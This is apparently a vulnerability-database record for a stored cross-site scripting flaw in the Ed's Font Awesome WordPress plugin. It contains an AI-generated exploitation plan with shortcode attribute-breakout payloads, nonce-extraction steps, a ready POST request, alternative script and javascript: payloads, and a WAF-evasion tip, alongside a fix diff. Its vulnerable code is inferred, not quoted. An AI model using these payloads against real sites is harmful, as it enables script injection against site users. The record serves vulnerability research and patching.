[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVi7q3oCxc3q6Brfz2U06L_6aTdXRGaGVCDZItHzEf-k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-2496","eds-font-awesome-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Ed's Font Awesome \u003C= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Ed's Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `eds_font_awesome` shortcode in all versions up to, and including, 2.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","eds-font-awesome",null,"\u003C=2.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:15:40","2026-04-15 17:39:44",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F435e8ca8-cf00-4de9-a454-8cb09b7661ef?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2496 (Ed's Font Awesome)\n\n## 1. Vulnerability Summary\nThe **Ed's Font Awesome** plugin (\u003C= 2.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the rendering logic of the `[eds_font_awesome]` shortcode. The plugin fails to sanitize or escape user-supplied attributes (such as `name`, `class`, or `size`) before echoing them within an HTML `\u003Ci>` or `\u003Cspan>` tag. \n\nBecause WordPress allows users with the **Contributor** role to use shortcodes but restricts them from using `unfiltered_html`, this vulnerability allows a low-privileged user to bypass security filters and inject arbitrary JavaScript that executes in the context of any user (including Administrators) who views the post.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** WordPress Post Editor (`\u002Fwp-admin\u002Fpost.php` or REST API `\u002Fwp\u002Fv2\u002Fposts`)\n* **Vulnerable Component:** Shortcode `[eds_font_awesome]`\n* **Vulnerable Parameter(s):** Shortcode attributes (specifically `name`, `class`, `size`, or `style`)\n* **Authentication Level:** Contributor+ (Authenticated)\n* **Preconditions:** The plugin must be active. A Contributor must have the ability to create or edit a post\u002Fpage.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers the shortcode during the `init` hook:\n `add_shortcode('eds_font_awesome', 'eds_fa_shortcode_handler');` (inferred function name).\n2. **Processing:** When a post is rendered, WordPress calls the handler function.\n3. **Attribute Extraction:** The handler uses `shortcode_atts()` to parse user input:\n ```php\n $a = shortcode_atts(array(\n 'name' => '',\n 'size' => '',\n 'class' => '',\n \u002F\u002F ... other attributes\n ), $atts);\n ```\n4. **Sink:** The extracted attributes are concatenated into an HTML string without using `esc_attr()`:\n ```php\n \u002F\u002F VULNERABLE SINK\n return '\u003Ci class=\"fa ' . $a['name'] . ' ' . $a['class'] . '\">\u003C\u002Fi>'; \n ```\n5. **Output:** The unsanitized string is returned to the WordPress content filter and displayed on the page.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this via the standard WordPress post creation flow, the agent must obtain a post-authoring nonce.\n\n1. **Authentication:** Login as a user with the `contributor` role.\n2. **Navigation:** Use `browser_navigate` to go to `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost-new.php`.\n3. **Extraction:** Use `browser_eval` to extract the `_wpnonce` required for the `post.php` endpoint.\n * Command: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4. **Alternative (REST API):** If the REST API is used, the agent needs the `X-WP-Nonce` header.\n * Command: `browser_eval(\"wpApiSettings.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a shortcode that breaks out of an HTML attribute to execute JavaScript.\n\n### Step-by-Step Plan:\n1. **Identify Attributes:** Use `grep -r \"add_shortcode\" .` in the plugin directory to find the handler function and identify which attributes are concatenated into the output.\n2. **Craft Payload:** \n * Attribute breakout: `name='fa-user\" onmouseover=\"alert(document.domain)\"'`\n * Full Shortcode: `[eds_font_awesome name='fa-user\" onmouseover=\"alert(document.domain)\"']`\n3. **Inject via HTTP Request:**\n * **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n * **Method:** `POST`\n * **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n * **Body:**\n ```\n action=editpost\n post_ID=[NEW_POST_ID]\n _wpnonce=[EXTRACTED_NONCE]\n post_title=VulnerablePost\n content=[eds_font_awesome name='fa-user\" onmouseover=\"alert(document.domain)\"']\n publish=Publish\n ```\n4. **Trigger:** Navigate to the public URL of the newly created post as any user.\n\n## 6. Test Data Setup\n1. **User Creation:** Create a user with the `contributor` role.\n * `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2. **Plugin Activation:** Ensure `eds-font-awesome` is active.\n * `wp plugin activate eds-font-awesome`\n3. **Post Initialization:** Create an initial draft to get a `post_ID`.\n * `wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID)`\n\n## 7. Expected Results\n* The HTTP response from `post.php` should indicate a successful redirect (302) or success.\n* When viewing the post HTML source, the rendered output should look like:\n `\u003Ci class=\"fa fa-user\" onmouseover=\"alert(document.domain)\" \">\u003C\u002Fi>`\n* The `onmouseover` event handler will be present in the DOM, executing the payload when a user hovers over the (invisible or small) icon.\n\n## 8. Verification Steps\n1. **Check Database:** Use WP-CLI to verify the shortcode is stored in the `post_content`.\n * `wp post get [ID] --field=post_content`\n2. **Verify Rendering:** Use `http_request` to fetch the post frontend and grep for the breakout.\n * `http_request(\"http:\u002F\u002Flocalhost:8080\u002F?p=[ID]\")`\n * Search for: `onmouseover=\"alert(document.domain)\"`\n3. **Verify Non-Escaping:** Confirm the `\"` character was not converted to `"`.\n\n## 9. Alternative Approaches\n* **Different Attributes:** If `name` is sanitized, try `class`, `size`, or `style`.\n* **Tag Breakout:** If the attribute is inside a double-quoted string, try: `name='fa-user\">\u003Cscript>alert(1)\u003C\u002Fscript>'`.\n* **CSS Injection:** If only the `style` attribute is vulnerable, use `style=\"background-image: url('javascript:alert(1)')\"`.\n* **REST API Injection:** Use `POST \u002Fwp\u002Fv2\u002Fposts\u002F[ID]` with the `X-WP-Nonce` header to update the content, which is often less protected by WAFs than the admin `post.php` endpoint.","The Ed's Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the [eds_font_awesome] shortcode. Due to missing sanitization and output escaping on attributes like 'name' and 'class', a contributor-level user can inject arbitrary JavaScript that executes whenever a user views the affected post.","\u002F\u002F Inferred registration and handler logic for the [eds_font_awesome] shortcode\n\nadd_shortcode('eds_font_awesome', 'eds_fa_shortcode_handler');\n\nfunction eds_fa_shortcode_handler( $atts ) {\n $a = shortcode_atts( array(\n 'name' => '',\n 'size' => '',\n 'class' => '',\n 'style' => '',\n ), $atts );\n\n \u002F\u002F VULNERABLE SINK: Attributes are concatenated into the HTML string without escaping\n return '\u003Ci class=\"fa ' . $a['name'] . ' ' . $a['class'] . '\" style=\"' . $a['style'] . '\">\u003C\u002Fi>'; \n}","--- a\u002Feds-font-awesome.php\n+++ b\u002Feds-font-awesome.php\n@@ -10,5 +10,5 @@\n ), $atts );\n \n- return '\u003Ci class=\"fa ' . $a['name'] . ' ' . $a['class'] . '\" style=\"' . $a['style'] . '\">\u003C\u002Fi>';\n+ return '\u003Ci class=\"fa ' . esc_attr($a['name']) . ' ' . esc_attr($a['class']) . '\" style=\"' . esc_attr($a['style']) . '\">\u003C\u002Fi>';\n }","1. Authenticate as a user with at least Contributor-level privileges (allows post creation and shortcode usage).\n2. Create a new post or page via the WordPress editor (e.g., \u002Fwp-admin\u002Fpost-new.php).\n3. Insert the [eds_font_awesome] shortcode with a malicious payload in one of its attributes (e.g., name or class) that breaks out of the HTML attribute context.\n4. Example payload: [eds_font_awesome name='fa-user\" onmouseover=\"alert(document.domain)\"']\n5. Save or publish the post.\n6. The payload executes in the browser of any user (including Administrators) who views the post on the frontend, triggering the JavaScript when they interact with or view the rendered icon tag.","gemini-3-flash-preview","2026-04-18 00:50:06","2026-04-18 00:50:28",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feds-font-awesome\u002Ftags"]